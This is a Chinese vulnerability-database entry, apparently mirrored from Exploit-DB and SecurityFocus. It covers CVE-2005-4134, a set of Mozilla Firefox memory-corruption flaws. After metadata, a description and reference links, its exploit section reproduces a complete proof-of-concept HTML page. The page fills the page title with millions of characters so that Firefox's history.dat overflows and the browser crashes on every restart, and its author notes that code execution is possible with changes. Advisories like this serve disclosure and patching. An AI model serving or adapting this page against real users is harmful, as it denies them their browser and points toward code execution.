Mozilla Firefox多个远程安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109420 漏洞类型 缓冲区溢出
发布时间 2005-12-08 更新时间 2008-09-10
CVE编号 CVE-2005-4134 CNNVD-ID CNNVD-200512-175
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/26762
https://www.securityfocus.com/bid/15773
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-175
|漏洞详情
MozillaFirefox是一款非常流行的开源WEB浏览器。MozillaFirefox实现上存在多个安全漏洞,远程攻击者可能利用此漏洞在用户系统上执行代码。FirefoxJavaScript引擎的垃圾收集引擎对临时变量没有充分保护,远程攻击者可以通过恶意创建特定的对象导致内存破坏。远程攻击者可以创建动态改变一个对象的风格来触发内存访问错误,从而可能导致执行任意指令。远程攻击者可以在HTML文件中引用Location和Navigator对象内置的QueryInterface()方法触发内存访问错误,可能导致执行任意指令。XULDocument.persist()功能没有正确验证用户提交的属性名称,远程攻击者可能在localstore.rdf中注入XML数据,这些数据会在浏览器启动时被加载进来。E4X、SVG和Canvas功能存在整数溢出漏洞,远程攻击者可能利用此漏洞执行任意指令。XML解析器可能读取缓冲区以外的数据,从而导致浏览器崩溃。E4X功能的实现上错误地把内部的AnyName对象暴露给Web内容,两个协同的域名可能利用它来传递信息,从而破坏同源策略。
|漏洞EXP
source: http://www.securityfocus.com/bid/15773/info

Mozilla Firefox is reportedly prone to a remote denial-of-service vulnerability.

This issue presents itself when the browser handles a large entry in the 'history.dat' file. An attacker may trigger this issue by enticing a user to visit a malicious website and by supplying excessive data to be stored in the affected file.

This may cause a denial-of-service condition.

**UPDATE: Proof-of-concept exploit code has been published. The author of the code attributes the crash to a buffer-overflow condition. Symantec has not reproduced the alleged flaw. 

<!-- Firefox 1.5 buffer overflow

Basically firefox logs all kinda of URL data in it's history.dat file,
this little script will set a really large topic and Firefox will then
save that topic into it's history.dat.. The next time that firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen everytime until you manually delete the history.dat file -- which
most users won't figure out.

this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifcations.

Tested with Firefox 1.5 on Windows XP SP2.

ZIPLOCK <sickbeatz@gmail.com>

-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
	var buffer = "";
	for (var i = 0; i < 5000; i++) {
		buffer += "A";
	}
	var buffer2 = buffer;
	for (i = 0; i < 500; i++) {
		buffer2 += buffer;
	}
	document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>
|受影响的产品
Ubuntu Ubuntu Linux 5.10 powerpc Ubuntu Ubuntu Linux 5.10 i386 Ubuntu Ubuntu Linux 5.10 amd64 Ubuntu Ubuntu Linux 5.0 4 powerpc Ubuntu Ubuntu Linux 5.0 4 i386 Ubuntu Ubuntu
|参考资料

来源:UBUNTU
名称:USN-275-1
链接:http://www.ubuntulinux.org/support/documentation/usn/usn-275-1
来源:UBUNTU
名称:USN-271-1
链接:http://www.ubuntulinux.org/support/documentation/usn/usn-271-1
来源:BID
名称:16476
链接:http://www.securityfocus.com/bid/16476
来源:BID
名称:15773
链接:http://www.securityfocus.com/bid/15773
来源:FEDORA
名称:FLSA-2006:180036-2
链接:http://www.securityfocus.com/archive/1/archive/1/425978/100/0/threaded
来源:FEDORA
名称:FLSA:180036-1
链接:http://www.securityfocus.com/archive/1/archive/1/425975/100/0/threaded
来源:REDHAT
名称:RHSA-2006:0200
链接:http://www.redhat.com/support/errata/RHSA-2006-0200.html
来源:REDHAT
名称:RHSA-2006:0199
链接:http://www.redhat.com/support/errata/RHSA-2006-0199.html
来源:FEDORA
名称:FEDORA-2006-076
链接:http://www.redhat.com/archives/fedora-announce-list/2006-February/msg00006.html
来源:FEDORA
名称:FEDORA-2006-075
链接:http://www.redhat.com/archives/fedora-announce-list/2006-February/msg00005.html
来源:OSVDB
名称:21533
链接:http://www.osvdb.org/21533
来源:MISC
链接:http://www.networksecurity.fi/advisorie